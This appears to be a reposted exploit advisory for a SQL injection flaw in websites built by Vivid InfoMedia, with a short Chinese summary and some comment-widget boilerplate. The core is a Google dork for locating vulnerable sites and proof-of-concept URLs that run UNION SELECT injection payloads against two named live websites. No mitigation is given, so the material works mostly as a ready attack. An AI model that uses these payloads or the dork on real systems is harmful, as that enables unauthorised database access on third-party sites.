Vivid InfoMedia - Sql Injection

Vivid InfoMedia - Sql Injection
Vivid InfoMedia 存在 SQL 注入漏洞，攻击者可通过修改 URL 参数执行恶意查询。该漏洞影响多个网站产品页面，如 cresha.org 和 akmlights.com。漏洞由 Behrouz Mansoori 发现并提供 PoC 验证。 2025-4-28 19:50:29 Author: cxsecurity.com(查看原文) 阅读量:26 收藏

Vivid InfoMedia - Sql Injection

********************************************************* #Exploit Title: Vivid InfoMedia - Sql Injection #Date: 2025-04-27 #Exploit Author: Behrouz Mansoori #Google Dork: "Developed & Maintained By Vivid InfoMedia" #Category:webapps #Tested On: Mac, Firefox Proof of Concept: ### Demo : https://cresha.org/Category-product.php?id=-101%27%20union%20select%201,version(),3,4,5,6,7,8,9--+ https://akmlights.com/lighting-product.php?id=-12%27%20union%20select%201,version(),3,4,5,6,7,8--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

文章来源: https://cxsecurity.com/issue/WLB-2025040039
如有侵权请联系:admin#unsafe.sh

Vivid InfoMedia - Sql Injection

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.